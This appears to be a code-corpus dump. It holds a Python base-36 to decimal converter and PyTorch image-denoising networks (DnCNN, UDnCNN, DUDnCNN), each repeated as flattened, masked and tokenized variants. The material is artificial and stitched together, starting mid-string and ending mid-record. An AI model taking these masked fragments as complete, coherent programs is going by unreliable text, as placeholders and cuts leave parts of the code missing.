A36Z :> ") num = num.upper() for digit in num: digit = digit.upper() if digit not in WORD: print(" **error** user input failed\n") print("do you want to re enter number") ans = input("y or n ") ans = ans.upper() if ans == "Y": num = enter_num() else: num = None return num # make list function. def mk_num_lst(num): """ make BASE 36 number from user into a list. reverse list so digit are read left to right. returns ------- num_lst """ num_lst = [] for digit in num: num_lst.append(digit) num_lst.reverse() return num_lst # convert function. def convert(num_lst): """ convert each digit to power of 36 appropriately. prints result in decimal. returns ------- dec """ dec = 0 for i in range(0, len(num_lst)): print("position right to left is >", i+1, "value is ", BASE[(num_lst[i])], "decimal value is", (36**i) * BASE[(num_lst[i])]) dec += (36**i) * BASE[(num_lst[i])] return dec # main program flow function. def main(): """ process valid user input or terminate program on failed input. """ num = enter_num() if num is not None: num_lst = mk_num_lst(num) dec = convert(num_lst) print("decimal value of BASE 36 number", num, "is", dec) else: print("user terminated program") # program start. main()
flexible
{ "blob_id": "5a265ecb9f1d6d0e4a5c66d241fbfe4a6df97825", "index": 8191, "step-1": "<mask token>\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. 
A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\ndef convert(num_lst):\n \"\"\" convert each digit to power of 36 appropriately.\n prints result in decimal.\n returns\n -------\n dec\n \"\"\"\n dec = 0\n for i in range(0, len(num_lst)):\n print('position right to left is >', i + 1, 'value is ', BASE[\n num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]])\n dec += 36 ** i * BASE[num_lst[i]]\n return dec\n\n\ndef main():\n \"\"\"\n process valid user input or\n terminate program on failed input.\n \"\"\"\n num = enter_num()\n if num is not None:\n num_lst = mk_num_lst(num)\n dec = convert(num_lst)\n print('decimal value of BASE 36 number', num, 'is', dec)\n else:\n print('user terminated program')\n\n\n<mask token>\n", "step-3": "<mask token>\nfor i, item in enumerate(WORD):\n BASE.update({WORD[i]: i})\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. 
A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\ndef convert(num_lst):\n \"\"\" convert each digit to power of 36 appropriately.\n prints result in decimal.\n returns\n -------\n dec\n \"\"\"\n dec = 0\n for i in range(0, len(num_lst)):\n print('position right to left is >', i + 1, 'value is ', BASE[\n num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]])\n dec += 36 ** i * BASE[num_lst[i]]\n return dec\n\n\ndef main():\n \"\"\"\n process valid user input or\n terminate program on failed input.\n \"\"\"\n num = enter_num()\n if num is not None:\n num_lst = mk_num_lst(num)\n dec = convert(num_lst)\n print('decimal value of BASE 36 number', num, 'is', dec)\n else:\n print('user terminated program')\n\n\nmain()\n", "step-4": "<mask token>\nWORD = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nBASE = {}\nfor i, item in enumerate(WORD):\n BASE.update({WORD[i]: i})\n\n\ndef enter_num():\n \"\"\" get user input and do error checking for illegal digits.\n returns\n -------\n num\n \"\"\"\n num = input('please enter a BASE 36 number, e.g. 
A36Z :> ')\n num = num.upper()\n for digit in num:\n digit = digit.upper()\n if digit not in WORD:\n print(' **error** user input failed\\n')\n print('do you want to re enter number')\n ans = input('y or n ')\n ans = ans.upper()\n if ans == 'Y':\n num = enter_num()\n else:\n num = None\n return num\n\n\ndef mk_num_lst(num):\n \"\"\" make BASE 36 number from user into a list.\n reverse list so digit are read left to right.\n returns\n -------\n num_lst\n \"\"\"\n num_lst = []\n for digit in num:\n num_lst.append(digit)\n num_lst.reverse()\n return num_lst\n\n\ndef convert(num_lst):\n \"\"\" convert each digit to power of 36 appropriately.\n prints result in decimal.\n returns\n -------\n dec\n \"\"\"\n dec = 0\n for i in range(0, len(num_lst)):\n print('position right to left is >', i + 1, 'value is ', BASE[\n num_lst[i]], 'decimal value is', 36 ** i * BASE[num_lst[i]])\n dec += 36 ** i * BASE[num_lst[i]]\n return dec\n\n\ndef main():\n \"\"\"\n process valid user input or\n terminate program on failed input.\n \"\"\"\n num = enter_num()\n if num is not None:\n num_lst = mk_num_lst(num)\n dec = convert(num_lst)\n print('decimal value of BASE 36 number', num, 'is', dec)\n else:\n print('user terminated program')\n\n\nmain()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 19 09:41:08 2018\r\nhexatrigesimal to decimal calculator,\r\nbase 36 encoding; use of letters with digits.\r\n@author: susan\r\n\"\"\"\r\n## create a dictionary as reference for BASE 36 calculations\r\nWORD = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\" # digits of BASE 36\r\nBASE = {}\r\nfor i, item in enumerate(WORD): # iterate through word\r\n BASE.update({WORD[i]:i}) # update BASE dictionary with key:value pair\r\n# input function, BASE 36 numbers for calculations.\r\ndef enter_num():\r\n \"\"\" get user input and do error checking for illegal digits.\r\n returns\r\n -------\r\n num\r\n \"\"\"\r\n num = input(\"please enter a BASE 36 number, e.g. 
A36Z :> \")\r\n num = num.upper()\r\n for digit in num:\r\n digit = digit.upper()\r\n if digit not in WORD:\r\n print(\" **error** user input failed\\n\")\r\n print(\"do you want to re enter number\")\r\n ans = input(\"y or n \")\r\n ans = ans.upper()\r\n if ans == \"Y\":\r\n num = enter_num()\r\n else:\r\n num = None\r\n return num\r\n# make list function.\r\ndef mk_num_lst(num):\r\n \"\"\" make BASE 36 number from user into a list.\r\n reverse list so digit are read left to right.\r\n returns\r\n -------\r\n num_lst\r\n \"\"\"\r\n num_lst = []\r\n for digit in num:\r\n num_lst.append(digit)\r\n num_lst.reverse()\r\n return num_lst\r\n# convert function.\r\ndef convert(num_lst):\r\n \"\"\" convert each digit to power of 36 appropriately.\r\n prints result in decimal.\r\n returns\r\n -------\r\n dec\r\n \"\"\"\r\n dec = 0\r\n for i in range(0, len(num_lst)):\r\n print(\"position right to left is >\", i+1,\r\n \"value is \", BASE[(num_lst[i])],\r\n \"decimal value is\",\r\n (36**i) * BASE[(num_lst[i])])\r\n dec += (36**i) * BASE[(num_lst[i])]\r\n return dec\r\n# main program flow function.\r\ndef main():\r\n \"\"\"\r\n process valid user input or\r\n terminate program on failed input.\r\n \"\"\"\r\n num = enter_num()\r\n if num is not None:\r\n num_lst = mk_num_lst(num)\r\n dec = convert(num_lst)\r\n print(\"decimal value of BASE 36 number\", num, \"is\", dec)\r\n else:\r\n print(\"user terminated program\")\r\n# program start.\r\nmain()\r\n", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
<|reserved_special_token_0|> class UDnCNN(NNRegressor): <|reserved_special_token_0|> <|reserved_special_token_0|> class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> <|reserved_special_token_0|> class DnCNN(NNRegressor): <|reserved_special_token_0|> <|reserved_special_token_0|> class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D self.conv = 
nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D // 2 - 1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D // 2 - 1, D // 2 + 1): h = F.relu(self.bn[i](self.conv[i + 1](h))) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D + 1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): 
nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> <|reserved_special_token_0|> class DnCNN(NNRegressor): <|reserved_special_token_0|> def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) for i in range(D): h = F.relu(self.bn[i](self.conv[i + 1](h))) y = self.conv[D + 1](h) + x return y class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D // 2 - 1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D // 2 - 1, D // 2 + 1): h = F.relu(self.bn[i](self.conv[i + 1](h))) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 h 
= F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D + 1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> import os import numpy as np import torch from torch import nn from torch.nn import functional as F import torch.utils.data as td import torchvision as tv 
import pandas as pd from PIL import Image from matplotlib import pyplot as plt from utils import imshow, NNRegressor class DnCNN(NNRegressor): def __init__(self, D, C=64): super(DnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) for i in range(D): h = F.relu(self.bn[i](self.conv[i + 1](h))) y = self.conv[D + 1](h) + x return y class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D // 2 - 1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D // 2 - 1, D // 2 + 1): h = F.relu(self.bn[i](self.conv[i + 1](h))) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = 
self.conv[D + 1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D k = [0] k.extend([i for i in range(D // 2)]) k.extend([k[-1] for _ in range(D // 2, D + 1)]) l = [(0) for _ in range(D // 2 + 1)] l.extend([i for i in range(D + 1 - (D // 2 + 1))]) l.append(l[-1]) holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)] dilations = [(i + 1) for i in holes] self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation= dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1], dilation=dilations[i + 1]) for i in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation =dilations[-1])) for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity= 'relu') self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D // 2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D // 2 - 1, D // 2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i + 1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D // 2 + 1, D): j = i - (D // 2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D + 1](h) + x return y <|reserved_special_token_1|> import os import numpy as np import torch from torch import nn from torch.nn import functional as F import torch.utils.data as td import torchvision as tv import pandas as pd from PIL import Image from matplotlib import pyplot as plt from utils import imshow, NNRegressor class DnCNN(NNRegressor): def 
__init__(self, D, C=64): super(DnCNN, self).__init__() self.D = D # convolution layers self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) # apply He's initialization for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_( self.conv[i].weight.data, nonlinearity='relu') # batch normalization self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) # initialize the weights of the Batch normalization layers for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) for i in range(D): h = F.relu(self.bn[i](self.conv[i+1](h))) y = self.conv[D+1](h) + x return y class UDnCNN(NNRegressor): def __init__(self, D, C=64): super(UDnCNN, self).__init__() self.D = D # convolution layers self.conv = nn.ModuleList() self.conv.append(nn.Conv2d(3, C, 3, padding=1)) self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)]) self.conv.append(nn.Conv2d(C, 3, 3, padding=1)) # apply He's initialization for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_( self.conv[i].weight.data, nonlinearity='relu') # batch normalization self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) # initialize the weights of the Batch normalization layers for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] idx_buff = [] shape_buff = [] for i in range(D//2-1): shape_buff.append(h.shape) h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i+1](h))), kernel_size=(2, 2), return_indices=True) h_buff.append(h) idx_buff.append(idx) for i in range(D//2-1, D//2+1): h = F.relu(self.bn[i](self.conv[i+1](h))) for i in range(D//2+1, D): j = i - (D // 2 + 1) + 1 h = 
F.max_unpool2d(F.relu(self.bn[i](self.conv[i+1]((h+h_buff[-j])/np.sqrt(2)))), idx_buff[-j], kernel_size=(2, 2), output_size=shape_buff[-j]) y = self.conv[D+1](h) + x return y class DUDnCNN(NNRegressor): def __init__(self, D, C=64): super(DUDnCNN, self).__init__() self.D = D # compute k(max_pool) and l(max_unpool) k = [0] k.extend([i for i in range(D//2)]) k.extend([k[-1] for _ in range(D//2, D+1)]) l = [0 for _ in range(D//2+1)] l.extend([i for i in range(D+1-(D//2+1))]) l.append(l[-1]) # holes and dilations for convolution layers holes = [2**(kl[0]-kl[1])-1 for kl in zip(k, l)] dilations = [i+1 for i in holes] # convolution layers self.conv = nn.ModuleList() self.conv.append( nn.Conv2d(3, C, 3, padding=dilations[0], dilation=dilations[0])) self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i+1], dilation=dilations[i+1]) for i in range(D)]) self.conv.append( nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation=dilations[-1])) # apply He's initialization for i in range(len(self.conv[:-1])): nn.init.kaiming_normal_( self.conv[i].weight.data, nonlinearity='relu') # batch normalization self.bn = nn.ModuleList() self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)]) # initialize the weights of the Batch normalization layers for i in range(D): nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C)) def forward(self, x): D = self.D h = F.relu(self.conv[0](x)) h_buff = [] for i in range(D//2 - 1): torch.backends.cudnn.benchmark = True h = self.conv[i+1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) h_buff.append(h) for i in range(D//2 - 1, D//2 + 1): torch.backends.cudnn.benchmark = True h = self.conv[i+1](h) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) for i in range(D//2 + 1, D): j = i - (D//2 + 1) + 1 torch.backends.cudnn.benchmark = True h = self.conv[i+1]((h + h_buff[-j]) / np.sqrt(2)) torch.backends.cudnn.benchmark = False h = F.relu(self.bn[i](h)) y = self.conv[D+1](h) + x return y
flexible
{ "blob_id": "9c60d82d42716abb036dc7297a2dca66f0508984", "index": 7626, "step-1": "<mask token>\n\n\nclass UDnCNN(NNRegressor):\n <mask token>\n <mask token>\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n for i in range(D // 2 - 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n h_buff.append(h)\n for i in range(D // 2 - 1, D // 2 + 1):\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1](h)\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n torch.backends.cudnn.benchmark = True\n h = self.conv[i + 1]((h + h_buff[-j]) / np.sqrt(2))\n torch.backends.cudnn.benchmark = False\n h = F.relu(self.bn[i](h))\n y = self.conv[D + 1](h) + x\n return y\n", "step-2": "<mask token>\n\n\nclass DnCNN(NNRegressor):\n <mask token>\n <mask token>\n\n\nclass 
UDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(UDnCNN, self).__init__()\n self.D = D\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=1))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=1) for _ in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=1))\n for i in range(len(self.conv[:-1])):\n nn.init.kaiming_normal_(self.conv[i].weight.data, nonlinearity=\n 'relu')\n self.bn = nn.ModuleList()\n self.bn.extend([nn.BatchNorm2d(C, C) for _ in range(D)])\n for i in range(D):\n nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))\n\n def forward(self, x):\n D = self.D\n h = F.relu(self.conv[0](x))\n h_buff = []\n idx_buff = []\n shape_buff = []\n for i in range(D // 2 - 1):\n shape_buff.append(h.shape)\n h, idx = F.max_pool2d(F.relu(self.bn[i](self.conv[i + 1](h))),\n kernel_size=(2, 2), return_indices=True)\n h_buff.append(h)\n idx_buff.append(idx)\n for i in range(D // 2 - 1, D // 2 + 1):\n h = F.relu(self.bn[i](self.conv[i + 1](h)))\n for i in range(D // 2 + 1, D):\n j = i - (D // 2 + 1) + 1\n h = F.max_unpool2d(F.relu(self.bn[i](self.conv[i + 1]((h +\n h_buff[-j]) / np.sqrt(2)))), idx_buff[-j], kernel_size=(2, \n 2), output_size=shape_buff[-j])\n y = self.conv[D + 1](h) + x\n return y\n\n\nclass DUDnCNN(NNRegressor):\n\n def __init__(self, D, C=64):\n super(DUDnCNN, self).__init__()\n self.D = D\n k = [0]\n k.extend([i for i in range(D // 2)])\n k.extend([k[-1] for _ in range(D // 2, D + 1)])\n l = [(0) for _ in range(D // 2 + 1)]\n l.extend([i for i in range(D + 1 - (D // 2 + 1))])\n l.append(l[-1])\n holes = [(2 ** (kl[0] - kl[1]) - 1) for kl in zip(k, l)]\n dilations = [(i + 1) for i in holes]\n self.conv = nn.ModuleList()\n self.conv.append(nn.Conv2d(3, C, 3, padding=dilations[0], dilation=\n dilations[0]))\n self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i + 1],\n dilation=dilations[i + 1]) for i in range(D)])\n self.conv.append(nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation\n =dilations[-1]))\n 
